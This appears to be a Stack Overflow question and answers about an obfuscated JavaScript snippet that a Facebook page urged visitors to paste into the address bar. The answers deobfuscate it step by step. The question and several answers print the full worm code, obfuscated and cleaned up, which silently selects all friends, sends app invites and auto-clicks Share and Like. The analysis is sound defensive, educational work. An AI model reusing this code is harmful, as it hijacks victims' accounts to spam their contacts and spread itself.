# What is this weird script I found on facebook?

Tags: javascript, facebook

Not so much a question to help my own programming, but I found this page on facebook with a cool illusion and a page that says "to see the real illusion, copy and paste this code into your address bar" and there is a script:

**DISCLAIMER: DO NOT RUN THE FOLLOWING CODE**

```
javascript:(function(){a='app129556453726651_fsDszN';
b='app129556453726651_rcgAmd';
rhsjGW='app129556453726651_rhsjGW';SqmbQL='app129556453726651_SqmbQL';
kPtsfs='app129556453726651_kPtsfs';
eval(function(p,a,c,k,e,r){e=function(c)
{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e)
{return r[e]}];e=function(){return'\\w+'};c=1};
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p}
('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];
d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);
s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g])
{F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);
',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||kPtsfs|fs|SocialGraphManager|for|in|if|20|SqmbQL|rhsjGW|21|2000|4000|3000'.split('|'),0,{}))})();
```

What the hell is this?  What would happen if I put it in my address bar, which I assume would be a very unwise idea?

I am confused.

Comment: Duplicate (or near duplicate) of http://stackoverflow.com/questions/2896405/what-does-this-code-do

Comment: i added a disclaimer to not run this code as it is malicious in its context..

Comment: In the form it is posted it gives a syntax error - since js strings cannot be multiline.

Answer (score 85, accepted):

It's unclear at first what that code does (as it is intended to be) so to answer your question, the code has to be unpacked. Just so you can follow my thinking, I'm including every step of the unobfuscation here.

This is the current form of the script with line breaks added:

```
(function() {
    a='app129556453726651_fsDszN';
    b='app129556453726651_rcgAmd';
    rhsjGW='app129556453726651_rhsjGW';
    SqmbQL='app129556453726651_SqmbQL';
    kPtsfs='app129556453726651_kPtsfs';

    eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||kPtsfs|fs|SocialGraphManager|for|in|if|20|SqmbQL|rhsjGW|21|2000|4000|3000'.split('|'),0,{}))
})();
```

As we can see, the script itself is a function inside a self calling closure that will execute instantly when the script is processed. The script contains some cryptic variables and some code packed with [Edward's packer](http://dean.edwards.name/packer/). When we unpack the code using an unpacker [like this](http://www.strictly-software.com/unpacker), we get the following form (line breaks added):

```
(function(){
    a='app129556453726651_fsDszN';
    b='app129556453726651_rcgAmd';
    rhsjGW='app129556453726651_rhsjGW';
    SqmbQL='app129556453726651_SqmbQL';
    kPtsfs='app129556453726651_kPtsfs';
    
    var variables = [
        "\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
        "\x73\x74\x79\x6C\x65",
        "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
        "\x68\x69\x64\x64\x65\x6E",
        "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
        "\x76\x61\x6C\x75\x65",
        "\x73\x75\x67\x67\x65\x73\x74",
        "\x6C\x69\x6B\x65\x6D\x65",
        "\x73\x6C\x69\x6E\x6B",
        "\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73",
        "\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74",
        "\x63\x6C\x69\x63\x6B",
        "\x69\x6E\x69\x74\x45\x76\x65\x6E\x74",
        "\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74",
        "\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
        "\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
        "\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
        "\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
        "\x69\x6E\x70\x75\x74",
        "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65",
        "\x53\x68\x61\x72\x65",
        "\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74"];

    d = document;
    d[variables[2]](kPtsfs)[variables[1]][variables[0]] = variables[3];
    d[variables[2]](a)[variables[4]] = d[variables[2]](b)[variables[5]];
    s = d[variables[2]](variables[6]);
    m = d[variables[2]](variables[7]);
    sl = d[variables[2]](variables[8]);
    c = d[variables[10]](variables[9]);
    c[variables[12]](variables[11], true, true);
    s[variables[13]](c);
    
    setTimeout(function () {
        fs[variables[14]]()
    }, 5000);
    
    setTimeout(function () {
        SocialGraphManager[variables[17]](variables[15], variables[16]);
        setTimeout(function () {
            c[variables[12]](variables[11], true, true);
            sl[variables[13]](c);
            setTimeout(function () {
                inp = document[variables[19]](variables[18]);
                for (i in inp) {
                    if (inp[i][variables[5]] == variables[20]) {
                        inp[i][variables[13]](c)
                    }
                };
                m[variables[13]](c);
                setTimeout(function () {
                    d[variables[2]](SqmbQL)[variables[4]] = d[variables[2]](rhsjGW)[variables[5]];
                }, 2000)
            }, 4000)
        }, 3000)
    }, 5000);
})();
```

We can instantly see from that that the code is executing commands in specific intervals, first after 5 seconds, then three, then four and finally after two seconds. The beginning of the script contains some hex encoded variables that can be decoded to this:

```
var variables = [
    "visibility",
    "style",
    "getElementById",
    "hidden",
    "innerHTML",
    "value",
    "suggest",
    "likeme",
    "slink",
    "MouseEvents",
    "createEvent",
    "click",
    "initEvent",
    "dispatchEvent",
    "select_all",
    "sgm_invite_form",
    "/ajax/social_graph/invite_dialog.php",
    "submitDialog",
    "input",
    "getElementsByTagName",
    "Share",
    "pop_content"];
```

By substituting those variables into the code, we get:

```
(function(){
    a='app129556453726651_fsDszN';
    b='app129556453726651_rcgAmd';
    rhsjGW='app129556453726651_rhsjGW';
    SqmbQL='app129556453726651_SqmbQL';
    kPtsfs='app129556453726651_kPtsfs';
    
    d = document;
    d["getElementById"](kPtsfs)["style"]["visibility"] = "hidden";
    d["getElementById"](a)["innerHTML"] = d["getElementById"](b)["value"];
    s = d["getElementById"]("suggest");
    m = d["getElementById"]("likeme");
    sl = d["getElementById"]("slink");
    c = d["createEvent"]("MouseEvents");
    c["initEvent"]("click", true, true);
    s["dispatchEvent"](c);
    
    setTimeout(function () {
        fs["select_all"]()
    }, 5000);
    
    setTimeout(function () {
        SocialGraphManager["submitDialog"]("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
        setTimeout(function () {
            c["initEvent"]("click", true, true);
            sl["dispatchEvent"](c);
            setTimeout(function () {
                inp = document["getElementsByTagName"]("input");
                for (i in inp) {
                    if (inp[i]["value"] == "Share") {
                        inp[i]["dispatchEvent"](c)
                    }
                };
                m["dispatchEvent"](c);
                setTimeout(function () {
                    d["getElementById"](SqmbQL)["innerHTML"] = d["getElementById"](rhsjGW)["value"];
                }, 2000)
            }, 4000)
        }, 3000)
    }, 5000);
})();
```

And as we know that `document['getElementById']` is the same as `document.getElementById`, we can clean up the code so it finally becomes readable. I've also done variable replacement and separated the setTimeouts for readability:

```
(function(){
    document.getElementById('app129556453726651_kPtsfs').style.visibility = "hidden";
    document.getElementById('app129556453726651_fsDszN').innerHTML = document.getElementById('app129556453726651_rcgAmd').value;
    s = document.getElementById("suggest");
    m = document.getElementById("likeme");
    sl = document.getElementById("slink");
    c = document.createEvent("MouseEvents");
    c.initEvent("click", true, true);
    s.dispatchEvent(c);
    
    setTimeout(function () {
        fs.select_all()
    }, 5000);
    
    setTimeout(function () {
        SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
    }, 5000);
    
    setTimeout(function () {
        c.initEvent("click", true, true);
        sl.dispatchEvent(c);
    }, 8000);
    
    setTimeout(function () {
        inp = document.getElementsByTagName("input");                    
        for (i in inp) {
            if (inp[i].value == "Share") {
                inp[i].dispatchEvent(c);
            }
        };                    
        m.dispatchEvent(c);                
    }, 12000);
    
    setTimeout(function () {
        document.getElementById('app129556453726651_SqmbQL').innerHTML = document.getElementById('app129556453726651_rhsjGW').value;
    }, 14000);
})();
```

Now, without knowing much of how Facebook works, this indeed looks malicious, sharing stuff you might not want to share etc. The main idea of this post was to show how you can decrypt scripts like this yourself also. :)

Comment: That is a very cool description/deciphering of that code. Very inspiring!

Comment: wow, thanks very much, that was very cool.  I don't think I could've done that.

Answer (score 4):

It is a facebook 'virus' of sort.. it actually invites all your friends to an app named socialgraph

reference: http://davezor.posterous.com/reverse-engineering-the-newest-facebook-invit

Answer (score 3):

This question comes up every day now...

It is code that invites all your friends to join a group (or something similar). Then the group starts spamming advertisements at it's members.

Answer (score 2):

Malicious Code

```
document.getElementById('app129556453726651_kPtsfs').style.visibility = 'hidden';
document.getElementById('app129556453726651_fsDszN').innerHTML = document.getElementById('app129556453726651_rcgAmd').value;
var s = document.getElementById('suggest');
var m = document.getElementById('likeme');
var sl = document.getElementById('slink');
var c = document.createEvent("MouseEvents");
c.initEvent('click', true, true);
s.dispatchEvent(c);
setTimeout(function () {
    fs.select_all()
    SocialGraphManager.submitDialog('sgm_invite_form', '/ajax/social_graph/invite_dialog.php');
    setTimeout(function () {
        c.initEvent('click', true, true);
        sl.dispatchEvent(c);
        setTimeout(function () {
            var inp = document.getElementsByTagName('input');
            for (i in inp) {
                if (inp[i].value == 'Share') {
                    inp[i].dispatchEvent(c)
                }
            };
            m.dispatchEvent(c);
            setTimeout(function () {
                document.getElementById('app129556453726651_SqmbQL').innerHTML = document.getElementById('app129556453726651_rhsjGW').value;
            }, 2000)
        }, 4000)
    }, 3000)
}, 5000);
```